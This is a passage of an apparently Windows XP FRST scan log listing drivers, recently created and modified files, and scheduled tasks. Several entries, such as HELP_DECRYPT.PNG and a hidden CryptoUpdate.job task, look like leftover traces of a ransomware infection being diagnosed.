    R3 ctprxy2k; C:\WINDOWS\System32\drivers\ctprxy2k.sys [6144 2003-02-20] (Creative Technology Ltd) [File not signed]
    R3 ctsfm2k; C:\WINDOWS\System32\drivers\ctsfm2k.sys [135248 2003-02-20] (Creative Technology Ltd) [File not signed]
    R0 Disk; C:\WINDOWS\System32\DRIVERS\disk.sys [36352 2008-04-13] (Microsoft Corporation) [File not signed]
    S4 dmboot; C:\WINDOWS\System32\drivers\dmboot.sys [799744 2008-04-13] (Microsoft Corp., Veritas Software) [File not signed]
    S4 dmio; C:\WINDOWS\System32\drivers\dmio.sys [153344 2008-04-13] (Microsoft Corp., Veritas Software) [File not signed]
    S4 dmload; C:\WINDOWS\System32\drivers\dmload.sys [5888 2004-08-04] (Microsoft Corp., Veritas Software.) [File not signed]
    S3 DMusic; C:\WINDOWS\System32\drivers\DMusic.sys [52864 2008-04-13] (Microsoft Corporation) [File not signed]
    S3 drmkaud; C:\WINDOWS\System32\drivers\drmkaud.sys [2944 2008-04-13] (Microsoft Corporation) [File not signed]
    R3 E1000; C:\WINDOWS\System32\DRIVERS\e1000325.sys [164352 2006-04-27] (Intel Corporation) [File not signed]
    R1 ElbyCDIO; C:\WINDOWS\System32\Drivers\ElbyCDIO.sys [25768 2009-09-26] (Elaborate Bytes AG)
    R3 emupia; C:\WINDOWS\System32\drivers\emupia2k.sys [116000 2003-02-20] (Creative Technology Ltd) [File not signed]
    R4 Fastfat; C:\WINDOWS\system32\Drivers\Fastfat.sys [143744 2008-04-13] (Microsoft Corporation) [File not signed]
    R3 Fdc; C:\WINDOWS\System32\DRIVERS\fdc.sys [27392 2008-04-13] (Microsoft Corporation) [File not signed]
    S3 FilterService; C:\WINDOWS\System32\DRIVERS\lvuvcflt.sys [23832 2009-10-07] (Logitech Inc.)
    R1 Fips; C:\WINDOWS\system32\Drivers\Fips.sys [44544 2008-04-13] (Microsoft Corporation) [File not signed]
    R3 Flpydisk; C:\WINDOWS\System32\DRIVERS\flpydisk.sys [20480 2008-04-13] (Microsoft Corporation) [File not signed]
    R0 FltMgr; C:\WINDOWS\System32\drivers\fltmgr.sys [129792 2008-04-13] (Microsoft Corporation) [File not signed]
    U1 Fs_Rec; C:\WINDOWS\system32\Drivers\Fs_Rec.sys [7936 2004-08-04] (Microsoft Corporation) [File not signed]
    R0 Ftdisk; C:\WINDOWS\System32\DRIVERS\ftdisk.sys [125056 2004-08-04] (Microsoft Corporation) [File not signed]
    R3 Gpc; C:\WINDOWS\System32\DRIVERS\msgpc.sys [35072 2008-04-13] (Microsoft Corporation) [File not signed]
    R3 GTNDIS5; C:\WINDOWS\system32\GTNDIS5.SYS [15872 2003-09-25] (Printing Communications Assoc., Inc. (PCAUSA)) [File not signed]
    R3 ha10kx2k; C:\WINDOWS\System32\drivers\ha10kx2k.sys [823616 2003-03-26] (Creative Technology Ltd) [File not signed]
    R3 hap16v2k; C:\WINDOWS\System32\drivers\hap16v2k.sys [141536 2003-03-26] (Creative Technology Ltd) [File not signed]
    R3 hidusb; C:\WINDOWS\System32\DRIVERS\hidusb.sys [10368 2008-04-13] (Microsoft Corporation) [File not signed]
    S3 HipShieldK; C:\WINDOWS\System32\drivers\HipShieldK.sys [147912 2013-09-23] (McAfee, Inc.)
    R3 HSFHWBS2; C:\WINDOWS\System32\DRIVERS\HSFHWBS2.sys [212224 2003-11-17] (Conexant Systems, Inc.) [File not signed]
    R3 HSF_DP; C:\WINDOWS\System32\DRIVERS\HSF_DP.sys [1042432 2003-11-17] (Conexant Systems, Inc.) [File not signed]
    R3 HTTP; C:\WINDOWS\System32\Drivers\HTTP.sys [265728 2009-10-20] (Microsoft Corporation) [File not signed]
    R1 i8042prt; C:\WINDOWS\System32\DRIVERS\i8042prt.sys [52480 2008-04-13] (Microsoft Corporation) [File not signed]
    R1 Imapi; C:\WINDOWS\System32\DRIVERS\imapi.sys [42112 2008-04-13] (Microsoft Corporation) [File not signed]
    R0 IntelIde; C:\WINDOWS\System32\DRIVERS\intelide.sys [5504 2008-04-13] (Microsoft Corporation) [File not signed]
    R1 intelppm; C:\WINDOWS\System32\DRIVERS\intelppm.sys [36352 2008-04-13] (Microsoft Corporation) [File not signed]
    S3 Ip6Fw; C:\WINDOWS\System32\drivers\ip6fw.sys [36608 2008-04-13] (Microsoft Corporation) [File not signed]
    S3 IpFilterDriver; C:\WINDOWS\System32\DRIVERS\ipfltdrv.sys [32896 2004-08-04] (Microsoft Corporation) [File not signed]
    S3 IpInIp; C:\WINDOWS\System32\DRIVERS\ipinip.sys [20864 2008-04-13] (Microsoft Corporation) [File not signed]
    R3 IpNat; C:\WINDOWS\System32\DRIVERS\ipnat.sys [152832 2008-04-13] (Microsoft Corporation) [File not signed]
    R1 IPSec; C:\WINDOWS\System32\DRIVERS\ipsec.sys [75264 2008-04-13] (Microsoft Corporation) [File not signed]
    S3 IRENUM; C:\WINDOWS\System32\DRIVERS\irenum.sys [11264 2008-04-13] (Microsoft Corporation) [File not signed]
    R0 isapnp; C:\WINDOWS\System32\DRIVERS\isapnp.sys [37248 2008-04-13] (Microsoft Corporation) [File not signed]
    R1 Kbdclass; C:\WINDOWS\System32\DRIVERS\kbdclass.sys [24576 2008-04-13] (Microsoft Corporation) [File not signed]
    R1 kbdhid; C:\WINDOWS\System32\DRIVERS\kbdhid.sys [14592 2008-04-13] (Microsoft Corporation) [File not signed]
    R3 kmixer; C:\WINDOWS\System32\drivers\kmixer.sys [172416 2008-04-13] (Microsoft Corporation) [File not signed]
    R0 KSecDD; C:\WINDOWS\system32\Drivers\KSecDD.sys [92928 2009-06-24] (Microsoft Corporation) [File not signed]
    S3 libusb0; C:\WINDOWS\System32\DRIVERS\libusb0.sys [42592 2012-07-31] (http://libusb-win32.sourceforge.net)
    R3 LVPr2Mon; C:\WINDOWS\System32\Drivers\LVPr2Mon.sys [25752 2009-10-07] ()
    R2 mdmxsdk; C:\WINDOWS\System32\DRIVERS\mdmxsdk.sys [11043 2003-04-09] (Conexant) [File not signed]
    R3 mfeapfk; C:\WINDOWS\System32\drivers\mfeapfk.sys [135968 2014-06-20] (McAfee, Inc.)
    R3 mfeavfk; C:\WINDOWS\System32\drivers\mfeavfk.sys [238176 2014-06-20] (McAfee, Inc.)
    S3 mfebopk; C:\WINDOWS\System32\drivers\mfebopk.sys [67816 2014-06-20] (McAfee, Inc.)
    R3 mfefirek; C:\WINDOWS\System32\drivers\mfefirek.sys [369248 2014-06-20] (McAfee, Inc.)
    R0 mfehidk; C:\WINDOWS\System32\drivers\mfehidk.sys [575984 2015-02-11] (McAfee, Inc.)
    R3 mfencbdc; C:\WINDOWS\System32\DRIVERS\mfencbdc.sys [350240 2014-08-20] (McAfee, Inc.)
    S3 mfencrk; C:\WINDOWS\System32\DRIVERS\mfencrk.sys [81296 2014-08-20] (McAfee, Inc.)
    S3 mfendisk; C:\WINDOWS\System32\DRIVERS\mfendisk.sys [87520 2014-06-20] (McAfee, Inc.)
    R3 mfendiskmp; C:\WINDOWS\System32\DRIVERS\mfendisk.sys [87520 2014-06-20] (McAfee, Inc.)
    R1 mfetdi2k; C:\WINDOWS\System32\drivers\mfetdi2k.sys [93624 2014-06-20] (McAfee, Inc.)
    R1 mnmdd; C:\WINDOWS\system32\Drivers\mnmdd.sys [4224 2004-08-04] (Microsoft Corporation) [File not signed]
    R3 Modem; C:\WINDOWS\system32\Drivers\Modem.sys [30080 2008-04-13] (Microsoft Corporation) [File not signed]
    S3 MODEMCSA; C:\WINDOWS\System32\drivers\MODEMCSA.sys [16128 2001-08-17] (Microsoft Corporation) [File not signed]
    S3 motccgp; C:\WINDOWS\System32\DRIVERS\motccgp.sys [20480 2011-04-04] (Motorola) [File not signed]
    S3 motccgpfl; C:\WINDOWS\System32\DRIVERS\motccgpfl.sys [8320 2009-01-29] (Motorola) [File not signed]
    S3 motmodem; C:\WINDOWS\System32\DRIVERS\motmodem.sys [24064 2011-03-31] (Motorola) [File not signed]
    S3 MotoSwitchService; C:\WINDOWS\System32\DRIVERS\motswch.sys [6400 2007-11-02] (Motorola) [File not signed]
    S3 Motousbnet; C:\WINDOWS\System32\DRIVERS\Motousbnet.sys [23424 2010-04-01] (Motorola) [File not signed]
    S3 motusbdevice; C:\WINDOWS\System32\DRIVERS\motusbdevice.sys [9472 2010-01-25] (Motorola Inc) [File not signed]
    R1 Mouclass; C:\WINDOWS\System32\DRIVERS\mouclass.sys [23040 2008-04-13] (Microsoft Corporation) [File not signed]
    R3 mouhid; C:\WINDOWS\System32\DRIVERS\mouhid.sys [12160 2004-08-04] (Microsoft Corporation) [File not signed]
    R0 MountMgr; C:\WINDOWS\system32\Drivers\MountMgr.sys [42368 2008-04-13] (Microsoft Corporation) [File not signed]
    R3 MRxDAV; C:\WINDOWS\System32\DRIVERS\mrxdav.sys [180608 2008-04-13] (Microsoft Corporation) [File not signed]
    R1 MRxSmb; C:\WINDOWS\System32\DRIVERS\mrxsmb.sys [456320 2011-07-15] (Microsoft Corporation) [File not signed]
    S3 MSDV; C:\WINDOWS\System32\DRIVERS\msdv.sys [51200 2008-04-13] (Microsoft Corporation) [File not signed]
    R1 Msfs; C:\WINDOWS\system32\Drivers\Msfs.sys [19072 2008-04-13] (Microsoft Corporation) [File not signed]
    S3 MSKSSRV; C:\WINDOWS\System32\drivers\MSKSSRV.sys [7552 2008-04-13] (Microsoft Corporation) [File not signed]
    S3 MSPCLOCK; C:\WINDOWS\System32\drivers\MSPCLOCK.sys [5376 2008-04-13] (Microsoft Corporation) [File not signed]
    S3 MSPQM; C:\WINDOWS\System32\drivers\MSPQM.sys [4992 2008-04-13] (Microsoft Corporation) [File not signed]
    R3 mssmbios; C:\WINDOWS\System32\DRIVERS\mssmbios.sys [15488 2008-04-13] (Microsoft Corporation) [File not signed]
    S3 MSTEE; C:\WINDOWS\System32\drivers\MSTEE.sys [5504 2008-04-13] (Microsoft Corporation) [File not signed]
    R0 Mup; C:\WINDOWS\system32\Drivers\Mup.sys [105472 2011-04-21] (Microsoft Corporation) [File not signed]
    R3 MxlW2k; C:\WINDOWS\system32\Drivers\MxlW2k.sys [28352 2010-01-12] (MusicMatch, Inc.) [File not signed]
    S3 NABTSFEC; C:\WINDOWS\System32\DRIVERS\NABTSFEC.sys [85248 2008-04-13] (Microsoft Corporation) [File not signed]
    R0 NDIS; C:\WINDOWS\system32\Drivers\NDIS.sys [182656 2008-04-13] (Microsoft Corporation) [File not signed]
    S3 NdisIP; C:\WINDOWS\System32\DRIVERS\NdisIP.sys [10880 2008-04-13] (Microsoft Corporation) [File not signed]
    R3 NdisTapi; C:\WINDOWS\System32\DRIVERS\ndistapi.sys [10496 2011-07-08] (Microsoft Corporation) [File not signed]
    R3 Ndisuio; C:\WINDOWS\System32\DRIVERS\ndisuio.sys [14592 2008-04-13] (Microsoft Corporation) [File not signed]
    R3 NdisWan; C:\WINDOWS\System32\DRIVERS\ndiswan.sys [91520 2008-04-13] (Microsoft Corporation) [File not signed]
    R3 NDProxy; C:\WINDOWS\system32\Drivers\NDProxy.sys [40960 2013-11-27] (Microsoft Corporation) [File not signed]
    R1 NetBIOS; C:\WINDOWS\System32\DRIVERS\netbios.sys [34688 2008-04-13] (Microsoft Corporation) [File not signed]
    R1 NetBT; C:\WINDOWS\System32\DRIVERS\netbt.sys [162816 2008-04-13] (Microsoft Corporation) [File not signed]
    R3 NIC1394; C:\WINDOWS\System32\DRIVERS\nic1394.sys [61824 2008-04-13] (Microsoft Corporation) [File not signed]
    R1 Npfs; C:\WINDOWS\system32\Drivers\Npfs.sys [30848 2008-04-13] (Microsoft Corporation) [File not signed]
    R4 Ntfs; C:\WINDOWS\system32\Drivers\Ntfs.sys [574976 2008-04-13] (Microsoft Corporation) [File not signed]
    R1 Null; C:\WINDOWS\system32\Drivers\Null.sys [2944 2004-08-04] (Microsoft Corporation) [File not signed]
    R3 nv; C:\WINDOWS\System32\DRIVERS\nv4_mini.sys [1897408 2004-08-04] (NVIDIA Corporation) [File not signed]
    S3 NwlnkFlt; C:\WINDOWS\System32\DRIVERS\nwlnkflt.sys [12416 2004-08-04] (Microsoft Corporation) [File not signed]
    S3 NwlnkFwd; C:\WINDOWS\System32\DRIVERS\nwlnkfwd.sys [32512 2004-08-04] (Microsoft Corporation) [File not signed]
    R0 ohci1394; C:\WINDOWS\System32\DRIVERS\ohci1394.sys [61696 2008-04-13] (Microsoft Corporation) [File not signed]
    R1 OMCI; C:\WINDOWS\SYSTEM32\DRIVERS\OMCI.SYS [13632 2001-08-22] (Dell Computer Corporation) [File not signed]
    R3 ossrv; C:\WINDOWS\System32\drivers\ctoss2k.sys [189504 2003-03-26] (Creative Technology Ltd.) [File not signed]
    R3 Parport; C:\WINDOWS\System32\DRIVERS\parport.sys [80128 2008-04-13] (Microsoft Corporation) [File not signed]
    R0 PartMgr; C:\WINDOWS\system32\Drivers\PartMgr.sys [19712 2008-04-13] (Microsoft Corporation) [File not signed]
    R2 ParVdm; C:\WINDOWS\system32\Drivers\ParVdm.sys [6784 2004-08-04] (Microsoft Corporation) [File not signed]
    R0 PCI; C:\WINDOWS\System32\DRIVERS\pci.sys [68224 2008-04-13] (Microsoft Corporation) [File not signed]
    R0 PCIIde; C:\WINDOWS\System32\DRIVERS\pciide.sys [3328 2001-08-17] (Microsoft Corporation) [File not signed]
    S4 Pcmcia; C:\WINDOWS\system32\Drivers\Pcmcia.sys [120192 2008-04-13] (Microsoft Corporation) [File not signed]
    R3 pcouffin; C:\WINDOWS\System32\Drivers\pcouffin.sys [47360 2010-09-17] (VSO Software) [File not signed]
    R2 PDFsFilter; C:\WINDOWS\System32\DRIVERS\PDFsFilter.sys [68464 2013-12-03] (Raxco Software, Inc.)
    R2 PfModNT; C:\WINDOWS\system32\drivers\PfModNT.sys [15840 2003-03-06] (Creative Technology Ltd.) [File not signed]
    R3 PptpMiniport; C:\WINDOWS\System32\DRIVERS\raspptp.sys [48384 2008-04-13] (Microsoft Corporation) [File not signed]
    R3 PSched; C:\WINDOWS\System32\DRIVERS\psched.sys [69120 2008-04-13] (Microsoft Corporation) [File not signed]
    R3 Ptilink; C:\WINDOWS\System32\DRIVERS\ptilink.sys [17792 2004-08-04] (Parallel Technologies, Inc.) [File not signed]
    R1 RasAcd; C:\WINDOWS\System32\DRIVERS\rasacd.sys [8832 2004-08-04] (Microsoft Corporation) [File not signed]
    R3 Rasl2tp; C:\WINDOWS\System32\DRIVERS\rasl2tp.sys [51328 2008-04-13] (Microsoft Corporation) [File not signed]
    R3 RasPppoe; C:\WINDOWS\System32\DRIVERS\raspppoe.sys [41472 2008-04-13] (Microsoft Corporation) [File not signed]
    R3 Raspti; C:\WINDOWS\System32\DRIVERS\raspti.sys [16512 2004-08-04] (Microsoft Corporation) [File not signed]
    R1 Rdbss; C:\WINDOWS\System32\DRIVERS\rdbss.sys [175744 2008-04-13] (Microsoft Corporation) [File not signed]
    R1 RDPCDD; C:\WINDOWS\System32\DRIVERS\RDPCDD.sys [4224 2004-08-04] (Microsoft Corporation) [File not signed]
    R1 redbook; C:\WINDOWS\System32\DRIVERS\redbook.sys [57600 2008-04-13] (Microsoft Corporation) [File not signed]
    S3 RemoteControl-USBLAN; C:\WINDOWS\System32\DRIVERS\rcblan.sys [39704 2007-01-24] (Belcarra Technologies)
    R3 RT73; C:\WINDOWS\System32\DRIVERS\rt73.sys [245248 2005-11-24] (Ralink Technology, Corp.) [File not signed]
    S3 Secdrv; C:\WINDOWS\System32\DRIVERS\secdrv.sys [20480 2008-04-13] (Macrovision Corporation, Macrovision Europe Limited, and Macrovision Japan and Asia K.K.) [File not signed]
    R3 serenum; C:\WINDOWS\System32\DRIVERS\serenum.sys [15744 2008-04-13] (Microsoft Corporation) [File not signed]
    R1 Serial; C:\WINDOWS\System32\DRIVERS\serial.sys [64512 2008-04-13] (Microsoft Corporation) [File not signed]
    S3 SLIP; C:\WINDOWS\System32\DRIVERS\SLIP.sys [11136 2008-04-13] (Microsoft Corporation) [File not signed]
    S3 splitter; C:\WINDOWS\System32\drivers\splitter.sys [6272 2008-04-13] (Microsoft Corporation) [File not signed]
    R0 sr; C:\WINDOWS\System32\DRIVERS\sr.sys [73472 2008-04-13] (Microsoft Corporation) [File not signed]
    R3 Srv; C:\WINDOWS\System32\DRIVERS\srv.sys [357888 2011-02-17] (Microsoft Corporation) [File not signed]
    S3 SSKBFD; C:\WINDOWS\System32\Drivers\sskbfd.sys [20848 2008-05-28] (Webroot Software Inc (www.webroot.com))
    R1 StarOpen; C:\WINDOWS\system32\Drivers\StarOpen.sys [5632 2011-07-25] () [File not signed]
    S3 streamip; C:\WINDOWS\System32\DRIVERS\StreamIP.sys [15232 2008-04-13] (Microsoft Corporation) [File not signed]
    R3 swenum; C:\WINDOWS\System32\DRIVERS\swenum.sys [4352 2008-04-13] (Microsoft Corporation) [File not signed]
    S3 swmidi; C:\WINDOWS\System32\drivers\swmidi.sys [56576 2008-04-13] (Microsoft Corporation) [File not signed]
    S3 SymEvent; C:\Program Files\Symantec\SYMEVENT.SYS [82136 2003-08-15] (Symantec Corporation)
    R3 sysaudio; C:\WINDOWS\System32\drivers\sysaudio.sys [60800 2008-04-13] (Microsoft Corporation) [File not signed]
    R1 Tcpip; C:\WINDOWS\System32\DRIVERS\tcpip.sys [361600 2008-06-20] (Microsoft Corporation) [File not signed]
    S3 TDPIPE; C:\WINDOWS\system32\Drivers\TDPIPE.sys [12040 2008-04-13] (Microsoft Corporation) [File not signed]
    S3 TDTCP; C:\WINDOWS\system32\Drivers\TDTCP.sys [21896 2008-04-13] (Microsoft Corporation) [File not signed]
    R1 TermDD; C:\WINDOWS\System32\DRIVERS\termdd.sys [40840 2008-04-13] (Microsoft Corporation) [File not signed]
    R3 Update; C:\WINDOWS\System32\DRIVERS\update.sys [384768 2008-04-13] (Microsoft Corporation) [File not signed]
    S3 USBAAPL; C:\WINDOWS\System32\Drivers\usbaapl.sys [44544 2012-09-28] (Apple, Inc.) [File not signed]
    S3 usbaudio; C:\WINDOWS\System32\drivers\usbaudio.sys [60160 2013-07-16] (Microsoft Corporation) [File not signed]
    R3 usbccgp; C:\WINDOWS\System32\DRIVERS\usbccgp.sys [32384 2013-08-08] (Microsoft Corporation) [File not signed]
    R3 usbehci; C:\WINDOWS\System32\DRIVERS\usbehci.sys [30336 2009-03-18] (Microsoft Corporation) [File not signed]
    R3 usbhub; C:\WINDOWS\System32\DRIVERS\usbhub.sys [59520 2008-04-13] (Microsoft Corporation) [File not signed]
    R3 usbprint; C:\WINDOWS\System32\DRIVERS\usbprint.sys [25856 2008-04-13] (Microsoft Corporation) [File not signed]
    R3 usbscan; C:\WINDOWS\System32\DRIVERS\usbscan.sys [14976 2013-07-02] (Microsoft Corporation) [File not signed]
    R3 USBSTOR; C:\WINDOWS\System32\DRIVERS\USBSTOR.SYS [26368 2008-04-13] (Microsoft Corporation) [File not signed]
    R3 usbuhci; C:\WINDOWS\System32\DRIVERS\usbuhci.sys [20608 2008-04-13] (Microsoft Corporation) [File not signed]
    S3 usbvideo; C:\WINDOWS\System32\Drivers\usbvideo.sys [123008 2013-07-16] (Microsoft Corporation) [File not signed]
    R1 VgaSave; C:\WINDOWS\System32\drivers\vga.sys [20992 2008-04-13] (Microsoft Corporation) [File not signed]
    R0 VolSnap; C:\WINDOWS\system32\Drivers\VolSnap.sys [52352 2008-04-13] (Microsoft Corporation) [File not signed]
    R3 Wanarp; C:\WINDOWS\System32\DRIVERS\wanarp.sys [34560 2008-04-13] (Microsoft Corporation) [File not signed]
    R3 wdmaud; C:\WINDOWS\System32\drivers\wdmaud.sys [83072 2008-04-13] (Microsoft Corporation) [File not signed]
    R3 winachsf; C:\WINDOWS\System32\DRIVERS\HSF_CNXT.sys [680704 2003-11-17] (Conexant Systems, Inc.) [File not signed]
    S3 WpdUsb; C:\WINDOWS\System32\DRIVERS\wpdusb.sys [38528 2006-10-18] (Microsoft Corporation) [File not signed]
    R2 Wpsnuio; C:\WINDOWS\System32\DRIVERS\wpsnuio.sys [13696 2013-05-31] (Skyhook Wireless) [File not signed]
    S3 WSTCODEC; C:\WINDOWS\System32\DRIVERS\WSTCODEC.SYS [19200 2008-04-13] (Microsoft Corporation) [File not signed]
    R0 WudfPf; C:\WINDOWS\System32\DRIVERS\WudfPf.sys [77568 2006-09-28] (Microsoft Corporation) [File not signed]
    S3 WudfRd; C:\WINDOWS\System32\DRIVERS\wudfrd.sys [82944 2006-09-28] (Microsoft Corporation) [File not signed]
    U0 mfewfpk; No ImagePath
    U5 ScsiPort; C:\WINDOWS\system32\drivers\scsiport.sys [96384 2008-04-13] (Microsoft Corporation) [File not signed]
    U1 WS2IFSL; No ImagePath

    ==================== NetSvcs (Whitelisted) ===================

    (If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)


    ==================== One Month Created Files and Folders ========

    (If an entry is included in the fixlist, the file\folder will be moved.)

    2015-03-28 19:49 - 2015-03-28 19:51 - 00000000 ____D () C:\FRST
    2015-03-28 19:40 - 2015-03-28 19:40 - 00000000 ____D () C:\Documents and Settings\RAUL_104\Local Settings\Application Data\IDTool
    2015-03-28 17:53 - 2015-03-28 17:53 - 00000000 ____D () C:\Documents and Settings\RAUL_104\Desktop\idtool
    2015-03-24 21:37 - 2015-03-24 21:37 - 00074703 _____ () C:\WINDOWS\system32\mfc45.dat
    2015-03-24 12:25 - 2015-03-24 12:27 - 00000000 ____D () C:\Program Files\Mozilla Firefox
    2015-03-22 23:32 - 2015-03-23 23:53 - 00000000 ____D () C:\Documents and Settings\RAUL_104\Desktop\AMY S3
    2015-03-12 09:57 - 2015-03-12 09:57 - 00000000 _____ () C:\avenger.txt
    2015-03-12 09:55 - 2015-03-12 09:55 - 00052440 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\imtmeaq.sys

    ==================== One Month Modified Files and Folders =======

    (If an entry is included in the fixlist, the file\folder will be moved.)

    2015-03-28 19:55 - 2009-03-26 12:27 - 00000000 ____D () C:\Documents and Settings\RAUL_104\Local Settings\Temp
    2015-03-28 19:38 - 2009-06-30 04:45 - 00000990 _____ () C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-515967899-117609710-839522115-1004UA.job
    2015-03-28 19:35 - 2012-08-28 00:18 - 00000886 _____ () C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
    2015-03-28 19:30 - 2009-03-26 07:12 - 00647862 _____ () C:\WINDOWS\system32\PerfStringBackup.INI
    2015-03-28 19:27 - 2013-05-10 23:06 - 00000000 ____D () C:\Documents and Settings\All Users\Start Menu\Programs\McAfee
    2015-03-28 19:22 - 2014-02-24 18:57 - 00524288 _____ () C:\WINDOWS\system32\config\ACEEvent.evt
    2015-03-28 19:20 - 2009-03-26 07:14 - 00000159 _____ () C:\WINDOWS\wiadebug.log
    2015-03-28 19:19 - 2010-12-16 01:45 - 00783804 _____ () C:\Documents and Settings\All Users\dleascan.log
    2015-03-28 19:19 - 2009-03-28 00:33 - 00000000 ____D () C:\MDT
    2015-03-28 19:19 - 2009-03-26 07:14 - 00000049 _____ () C:\WINDOWS\wiaservc.log
    2015-03-28 19:18 - 2015-01-16 18:19 - 00000254 ____H () C:\WINDOWS\Tasks\dluddia.job
    2015-03-28 19:18 - 2014-03-23 18:55 - 00000228 _____ () C:\WINDOWS\Tasks\Microsoft Windows XP End of Service Notification Logon.job
    2015-03-28 19:18 - 2012-08-28 00:18 - 00000882 _____ () C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
    2015-03-28 19:18 - 2010-08-08 00:34 - 00000616 ____H () C:\WINDOWS\Tasks\ConfigExec.job
    2015-03-28 19:18 - 2009-03-26 12:23 - 00000006 ____H () C:\WINDOWS\Tasks\SA.DAT
    2015-03-28 19:17 - 2009-03-26 16:49 - 00001080 _____ () C:\WINDOWS\system32\settingsbkup.sfm
    2015-03-28 19:17 - 2009-03-26 16:49 - 00001080 _____ () C:\WINDOWS\system32\settings.sfm
    2015-03-28 19:17 - 2009-03-26 16:49 - 00000288 _____ () C:\WINDOWS\system32\DVCStateBkp-{00000002-00000000-00000002-00001102-00000004-10031102}.dat
    2015-03-28 19:17 - 2009-03-26 16:49 - 00000288 _____ () C:\WINDOWS\system32\DVCState-{00000002-00000000-00000002-00001102-00000004-10031102}.dat
    2015-03-28 19:16 - 2014-04-13 01:41 - 01048576 _____ () C:\WINDOWS\system32\config\iolo App.evt
    2015-03-28 19:16 - 2014-01-19 02:28 - 00178066 _____ () C:\Documents and Settings\LocalService\Local Settings\Application Data\WPFFontCache_v0400-System.dat
    2015-03-28 19:16 - 2013-10-14 00:56 - 00593344 _____ () C:\Documents and Settings\LocalService\Local Settings\Application Data\FontCache3.0.0.0.dat
    2015-03-28 19:16 - 2010-08-07 23:59 - 15728640 _____ () C:\WINDOWS\system32\config\WindowsPowerShell.evt
    2015-03-28 19:16 - 2009-03-26 12:27 - 00000178 ___SH () C:\Documents and Settings\RAUL_104\ntuser.ini
    2015-03-28 19:16 - 2009-03-26 12:23 - 00032564 _____ () C:\WINDOWS\SchedLgU.Txt
    2015-03-28 19:16 - 2009-03-26 12:20 - 02041696 _____ () C:\WINDOWS\WindowsUpdate.log
    2015-03-28 19:13 - 2009-03-26 14:46 - 04481358 _____ () C:\WINDOWS\{00000002-00000000-00000002-00001102-00000004-10031102}.CDF
    2015-03-28 19:09 - 2014-09-26 19:45 - 00000830 _____ () C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
    2015-03-28 18:57 - 2009-03-26 07:10 - 00000211 ___SH () C:\boot.ini
    2015-03-28 18:57 - 2004-08-04 06:00 - 00000687 _____ () C:\WINDOWS\win.ini
    2015-03-28 18:57 - 2004-08-04 06:00 - 00000227 _____ () C:\WINDOWS\system.ini
    2015-03-28 16:52 - 2015-02-01 00:28 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\MFAData
    2015-03-27 20:34 - 2010-08-08 00:34 - 00000580 ____H () C:\WINDOWS\Tasks\DataUpload.job
    2015-03-27 13:01 - 2014-04-05 13:35 - 00000458 _____ () C:\WINDOWS\Tasks\SystemToolsDailyTest.job
    2015-03-27 12:38 - 2009-06-30 04:45 - 00000938 _____ () C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-515967899-117609710-839522115-1004Core.job
    2015-03-27 02:04 - 2015-01-27 20:14 - 00000412 ____H () C:\WINDOWS\Tasks\CryptoUpdate.job
    2015-03-26 13:13 - 2012-04-29 19:25 - 00000000 ____D () C:\Program Files\Mozilla Maintenance Service
    2015-03-24 23:25 - 2012-04-07 03:32 - 00778928 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\FlashPlayerApp.exe
    2015-03-24 23:25 - 2011-05-15 18:00 - 00142512 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\FlashPlayerCPLApp.cpl
    2015-03-24 23:25 - 2009-03-27 11:50 - 00000000 ____D () C:\Documents and Settings\RAUL_104\Local Settings\Application Data\Adobe
    2015-03-24 21:59 - 2012-08-04 22:57 - 00015414 _____ () C:\WINDOWS\wmsetup.log
    2015-03-24 21:57 - 2010-03-16 23:31 - 00000069 _____ () C:\WINDOWS\NeroDigital.ini
    2015-03-24 21:57 - 2010-02-18 15:12 - 00000128 _____ () C:\Documents and Settings\RAUL_104\Application Data\default.rss
    2015-03-24 04:44 - 2011-08-19 23:54 - 00000000 ____D () C:\Documents and Settings\RAUL_104\Application Data\FileZilla
    2015-03-21 13:39 - 2009-03-27 00:28 - 00002309 _____ () C:\Documents and Settings\RAUL_104\Desktop\Google Chrome.lnk
    2015-03-21 04:00 - 2010-09-10 16:07 - 00000330 ____H () C:\WINDOWS\Tasks\MP Scheduled Scan.job
    2015-03-21 04:00 - 2009-03-26 12:23 - 00000000 ____D () C:\Documents and Settings\NetworkService\Local Settings\Temp
    2015-03-19 10:13 - 2009-03-26 12:27 - 00000000 ____D () C:\Documents and Settings\RAUL_104
    2015-03-19 09:38 - 2004-08-04 06:00 - 00002206 _____ () C:\WINDOWS\system32\wpa.dbl
    2015-03-13 11:52 - 2015-01-25 21:09 - 00114904 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
    2015-03-12 09:55 - 2009-12-08 21:20 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB970430$
    2015-03-09 12:47 - 2015-02-01 00:49 - 00000702 _____ () C:\Documents and Settings\All Users\Desktop\AVG 2015.lnk
    2015-03-09 12:47 - 2015-02-01 00:49 - 00000000 ____D () C:\Documents and Settings\All Users\Start Menu\Programs\AVG
    2015-03-09 12:40 - 2015-02-01 00:42 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\AVG2015
    2015-03-09 10:09 - 2014-03-23 18:55 - 00000222 _____ () C:\WINDOWS\Tasks\Microsoft Windows XP End of Service Notification Monthly.job
    2015-03-08 17:51 - 2010-09-15 20:25 - 00000000 ____D () C:\Documents and Settings\AMY_1061\Local Settings\Temp
    2015-03-01 11:01 - 2014-04-05 13:35 - 00000520 _____ () C:\WINDOWS\Tasks\PCDoctorBackgroundMonitorTask.job
    2015-02-26 17:05 - 2010-02-01 18:16 - 00002187 _____ () C:\Documents and Settings\All Users\Desktop\Safari.lnk
    2015-02-26 17:04 - 2010-09-19 00:39 - 00002397 _____ () C:\Documents and Settings\All Users\Start Menu\Programs\Safari.lnk

    ==================== Files in the root of some directories =======

    2010-02-18 15:12 - 2015-03-24 21:57 - 0000128 _____ () C:\Documents and Settings\RAUL_104\Application Data\default.rss
    2015-01-27 22:42 - 2015-01-27 22:42 - 0045601 _____ () C:\Documents and Settings\RAUL_104\Application Data\HELP_DECRYPT.PNG
